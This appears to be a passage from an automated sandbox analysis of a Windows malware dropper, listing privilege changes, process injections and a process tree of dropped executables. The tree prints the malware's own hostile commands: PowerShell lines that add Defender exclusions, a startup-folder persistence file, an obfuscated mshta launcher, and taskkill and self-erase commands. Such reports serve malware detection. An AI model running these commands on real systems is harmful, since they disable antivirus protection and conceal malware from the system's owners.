Token: SeRemoteShutdownPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeUndockPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeSyncAgentPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeEnableDelegationPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeManageVolumePrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeImpersonatePrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeCreateGlobalPrivilege	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: 31	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: 32	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: 33	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: 34	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: 35	3036	cdw3osWat18CVPUn7rFB_Pj9.exe
Token: SeDebugPrivilege	3224	mbSorhGxB1pNBjghFG36e2Ru.exe
Token: SeDebugPrivilege	2068	ydWz5wGfm19stkAY4iMIn9Xd.exe
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeDebugPrivilege	4048	DownFlSetup110.exe
Token: SeDebugPrivilege	2756	CmP8WQcQIe09qWeNkvEOhtAh.exe
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeRestorePrivilege	3912	WerFault.exe
Token: SeBackupPrivilege	3912	WerFault.exe
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeDebugPrivilege	4268	cscript.exe
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeDebugPrivilege	3912	WerFault.exe
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeShutdownPrivilege	2540	Explorer.EXE
Token: SeCreatePagefilePrivilege	2540	Explorer.EXE
Token: SeCreateTokenPrivilege	5100	askinstall25.exe
Token: SeAssignPrimaryTokenPrivilege	5100	askinstall25.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

description	pid	process	target process
PID 816 wrote to memory of 728	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	MGF06eWV2QxiQ3cG6az4tr31.exe
PID 816 wrote to memory of 728	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	MGF06eWV2QxiQ3cG6az4tr31.exe
PID 816 wrote to memory of 2548	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	4N57m2SeL5IiTI5AG0oY8LBW.exe
PID 816 wrote to memory of 2548	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	4N57m2SeL5IiTI5AG0oY8LBW.exe
PID 816 wrote to memory of 2548	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	4N57m2SeL5IiTI5AG0oY8LBW.exe
PID 816 wrote to memory of 2328	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XfUGHJGj5rWE0ozUme5gWt4O.exe
PID 816 wrote to memory of 2328	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XfUGHJGj5rWE0ozUme5gWt4O.exe
PID 816 wrote to memory of 2328	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XfUGHJGj5rWE0ozUme5gWt4O.exe
PID 816 wrote to memory of 2756	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	CmP8WQcQIe09qWeNkvEOhtAh.exe
PID 816 wrote to memory of 2756	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	CmP8WQcQIe09qWeNkvEOhtAh.exe
PID 816 wrote to memory of 2756	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	CmP8WQcQIe09qWeNkvEOhtAh.exe
PID 816 wrote to memory of 4092	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	YyH9SXCqivTrzrPqI3uYJQMd.exe
PID 816 wrote to memory of 4092	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	YyH9SXCqivTrzrPqI3uYJQMd.exe
PID 816 wrote to memory of 4092	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	YyH9SXCqivTrzrPqI3uYJQMd.exe
PID 816 wrote to memory of 2968	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	PWokcJndamMPSc5Glm9GSVbb.exe
PID 816 wrote to memory of 2968	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	PWokcJndamMPSc5Glm9GSVbb.exe
PID 816 wrote to memory of 2968	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	PWokcJndamMPSc5Glm9GSVbb.exe
PID 816 wrote to memory of 3036	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cdw3osWat18CVPUn7rFB_Pj9.exe
PID 816 wrote to memory of 3036	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cdw3osWat18CVPUn7rFB_Pj9.exe
PID 816 wrote to memory of 3036	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	cdw3osWat18CVPUn7rFB_Pj9.exe
PID 816 wrote to memory of 3328	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	i_L0A7LldAXrsKpzFi5txJoI.exe
PID 816 wrote to memory of 3328	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	i_L0A7LldAXrsKpzFi5txJoI.exe
PID 816 wrote to memory of 3328	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	i_L0A7LldAXrsKpzFi5txJoI.exe
PID 816 wrote to memory of 4024	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	L6I6NKG1SWCIDwWSCHB1rBJU.exe
PID 816 wrote to memory of 4024	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	L6I6NKG1SWCIDwWSCHB1rBJU.exe
PID 816 wrote to memory of 4024	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	L6I6NKG1SWCIDwWSCHB1rBJU.exe
PID 816 wrote to memory of 3188	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XLxRmbPcDQ4F7J32lIdFDeny.exe
PID 816 wrote to memory of 3188	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XLxRmbPcDQ4F7J32lIdFDeny.exe
PID 816 wrote to memory of 3188	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	XLxRmbPcDQ4F7J32lIdFDeny.exe
PID 816 wrote to memory of 3116	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	B6Bw0roWFP55xUoOvHs45zOz.exe
PID 816 wrote to memory of 3116	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	B6Bw0roWFP55xUoOvHs45zOz.exe
PID 816 wrote to memory of 3116	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	B6Bw0roWFP55xUoOvHs45zOz.exe
PID 816 wrote to memory of 3224	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	mbSorhGxB1pNBjghFG36e2Ru.exe
PID 816 wrote to memory of 3224	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	mbSorhGxB1pNBjghFG36e2Ru.exe
PID 816 wrote to memory of 3224	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	mbSorhGxB1pNBjghFG36e2Ru.exe
PID 816 wrote to memory of 2496	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	IuYBm3lYwBFvWH4EQPU9_Ywq.exe
PID 816 wrote to memory of 2496	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	IuYBm3lYwBFvWH4EQPU9_Ywq.exe
PID 816 wrote to memory of 2496	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	IuYBm3lYwBFvWH4EQPU9_Ywq.exe
PID 816 wrote to memory of 3684	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	scfT65Yi8gy0dT5r5wdXmZND.exe
PID 816 wrote to memory of 3684	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	scfT65Yi8gy0dT5r5wdXmZND.exe
PID 816 wrote to memory of 3684	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	scfT65Yi8gy0dT5r5wdXmZND.exe
PID 816 wrote to memory of 2212	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	0u2xG04QKCAjjQdTQBYBGzVU.exe
PID 816 wrote to memory of 2212	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	0u2xG04QKCAjjQdTQBYBGzVU.exe
PID 816 wrote to memory of 2212	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	0u2xG04QKCAjjQdTQBYBGzVU.exe
PID 816 wrote to memory of 2684	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	ofHj9XDxpCLOcd4Ya1bSIs3C.exe
PID 816 wrote to memory of 2684	816	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe	ofHj9XDxpCLOcd4Ya1bSIs3C.exe
PID 816 wrote to memory of 2064	816		_Jl5NRQH_VCxgKevGBMlhDUr.exe
PID 816 wrote to memory of 2064	816		_Jl5NRQH_VCxgKevGBMlhDUr.exe
PID 816 wrote to memory of 2064	816		_Jl5NRQH_VCxgKevGBMlhDUr.exe
PID 816 wrote to memory of 2068	816		ydWz5wGfm19stkAY4iMIn9Xd.exe
PID 816 wrote to memory of 2068	816		ydWz5wGfm19stkAY4iMIn9Xd.exe
PID 816 wrote to memory of 1296	816		zpFE8L30S3ZheXNi_5l2ALWi.exe
PID 816 wrote to memory of 1296	816		zpFE8L30S3ZheXNi_5l2ALWi.exe
PID 816 wrote to memory of 1296	816		zpFE8L30S3ZheXNi_5l2ALWi.exe
PID 816 wrote to memory of 2232	816		7nRws0NZGWjLcr1qIJ1Igckp.exe
PID 816 wrote to memory of 2232	816		7nRws0NZGWjLcr1qIJ1Igckp.exe
PID 816 wrote to memory of 2232	816		7nRws0NZGWjLcr1qIJ1Igckp.exe
PID 816 wrote to memory of 2088	816		U8hSQeS66LgtVXmVBPhymyYt.exe
PID 816 wrote to memory of 2088	816		U8hSQeS66LgtVXmVBPhymyYt.exe
PID 816 wrote to memory of 2088	816		U8hSQeS66LgtVXmVBPhymyYt.exe
PID 816 wrote to memory of 1012	816		rJhMZvnFmewWMgIePRFsY_sA.exe
PID 816 wrote to memory of 1012	816		rJhMZvnFmewWMgIePRFsY_sA.exe
PID 816 wrote to memory of 1012	816		rJhMZvnFmewWMgIePRFsY_sA.exe
PID 816 wrote to memory of 1988	816		64sJSaHtBgpmY3s9JraLL3AH.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"
2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:816

C:\Users\Admin\Pictures\Adobe Films\MGF06eWV2QxiQ3cG6az4tr31.exe
"C:\Users\Admin\Pictures\Adobe Films\MGF06eWV2QxiQ3cG6az4tr31.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:728

C:\Users\Admin\Pictures\Adobe Films\4N57m2SeL5IiTI5AG0oY8LBW.exe
"C:\Users\Admin\Pictures\Adobe Films\4N57m2SeL5IiTI5AG0oY8LBW.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2548

C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe
"C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe"
3⤵
- Executes dropped EXE
PID:2328

C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\89895c28-01c1-4e21-ae01-986b839a881d\AdvancedRun.exe" /SpecialRun 4101d8 5136
5⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4⤵
- Executes dropped EXE
PID:5504

C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\07afaac2-12b9-4e5c-984a-85e14dd50d80\AdvancedRun.exe" /SpecialRun 4101d8 5504
5⤵
PID:4992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force
4⤵
PID:5088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force
4⤵
PID:5920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force
4⤵
PID:3752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
4⤵
PID:4372

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"
4⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
5⤵
PID:7716

C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\386b386e-8326-4863-9f58-8a9d7da91a73\AdvancedRun.exe" /SpecialRun 4101d8 7716
6⤵
PID:8160

C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
5⤵
PID:7816

C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\e31f8f50-4b2e-45b5-8ebf-82cd3710d9ae\AdvancedRun.exe" /SpecialRun 4101d8 7816
6⤵
PID:7524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
5⤵
PID:3964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
5⤵
PID:2532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
5⤵
PID:7068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
5⤵
PID:8056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
5⤵
- Executes dropped EXE
PID:4908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
5⤵
PID:7844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
5⤵
PID:2544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
5⤵
PID:8428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force
4⤵
PID:6436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
4⤵
PID:6240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
4⤵
PID:6908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\XfUGHJGj5rWE0ozUme5gWt4O.exe" -Force
4⤵
PID:7116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
4⤵
PID:5272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
4⤵
PID:7616

C:\Users\Admin\Pictures\Adobe Films\i_L0A7LldAXrsKpzFi5txJoI.exe
"C:\Users\Admin\Pictures\Adobe Films\i_L0A7LldAXrsKpzFi5txJoI.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3328

C:\Users\Admin\Pictures\Adobe Films\cdw3osWat18CVPUn7rFB_Pj9.exe
"C:\Users\Admin\Pictures\Adobe Films\cdw3osWat18CVPUn7rFB_Pj9.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:7388

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:8836

C:\Users\Admin\Pictures\Adobe Films\PWokcJndamMPSc5Glm9GSVbb.exe
"C:\Users\Admin\Pictures\Adobe Films\PWokcJndamMPSc5Glm9GSVbb.exe"
3⤵
- Executes dropped EXE
PID:2968

C:\Users\Admin\Pictures\Adobe Films\YyH9SXCqivTrzrPqI3uYJQMd.exe
"C:\Users\Admin\Pictures\Adobe Films\YyH9SXCqivTrzrPqI3uYJQMd.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4092

C:\Users\Admin\Documents\owY_g7gf7wrPiXIfc88VlEqk.exe
"C:\Users\Admin\Documents\owY_g7gf7wrPiXIfc88VlEqk.exe"
4⤵
PID:7812

C:\Users\Admin\Pictures\Adobe Films\KL1Sx3zXL9dnl28s_DQkjbNj.exe
"C:\Users\Admin\Pictures\Adobe Films\KL1Sx3zXL9dnl28s_DQkjbNj.exe"
5⤵
PID:5164

C:\Users\Admin\Pictures\Adobe Films\CeBYnvzipyGi9VupnEIWHAbX.exe
"C:\Users\Admin\Pictures\Adobe Films\CeBYnvzipyGi9VupnEIWHAbX.exe"
5⤵
PID:9008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "CeBYnvzipyGi9VupnEIWHAbX.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\CeBYnvzipyGi9VupnEIWHAbX.exe" & exit
6⤵
PID:9104

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "CeBYnvzipyGi9VupnEIWHAbX.exe" /f
7⤵
- Kills process with taskkill
PID:5140

C:\Users\Admin\Pictures\Adobe Films\ejydHrY4wIQ47KBH15LRNvQg.exe
"C:\Users\Admin\Pictures\Adobe Films\ejydHrY4wIQ47KBH15LRNvQg.exe"
5⤵
PID:4620

C:\Users\Admin\Pictures\Adobe Films\EYknBp1ulqVoJD36nUNXUOxq.exe
"C:\Users\Admin\Pictures\Adobe Films\EYknBp1ulqVoJD36nUNXUOxq.exe"
5⤵
PID:2360

C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe
"C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"
5⤵
PID:9124

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4624

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\XEtFW6y9YZZi1S7OT_rg9zA7.exe" ) do taskkill -f -iM "%~NxM"
7⤵
PID:4792

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "XEtFW6y9YZZi1S7OT_rg9zA7.exe"
8⤵
- Kills process with taskkill
PID:7972

C:\Users\Admin\Pictures\Adobe Films\TTp54AqS3Xeuh140DQWkoEDm.exe
"C:\Users\Admin\Pictures\Adobe Films\TTp54AqS3Xeuh140DQWkoEDm.exe"
5⤵
PID:7872

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
6⤵
PID:3456

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
7⤵
PID:8876

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1b4,0x1f8,0x7ffbfd07dec0,0x7ffbfd07ded0,0x7ffbfd07dee0
8⤵
PID:9448

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6bf1f9e70,0x7ff6bf1f9e80,0x7ff6bf1f9e90
9⤵
PID:9772

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,4159062920383515488,13865095438280234276,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8876_1082268702" --mojo-platform-channel-handle=1672 /prefetch:8
8⤵
PID:6980

C:\Users\Admin\Pictures\Adobe Films\7jBCszsahJM8XJ50JwHaOcRd.exe
"C:\Users\Admin\Pictures\Adobe Films\7jBCszsahJM8XJ50JwHaOcRd.exe"
5⤵
PID:8472

C:\Users\Admin\AppData\Local\Temp\is-J72BE.tmp\7jBCszsahJM8XJ50JwHaOcRd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J72BE.tmp\7jBCszsahJM8XJ50JwHaOcRd.tmp" /SL5="$105B6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\7jBCszsahJM8XJ50JwHaOcRd.exe"
6⤵
- Executes dropped EXE
PID:5136

C:\Users\Admin\AppData\Local\Temp\is-NCTT6.tmp\DYbALA.exe
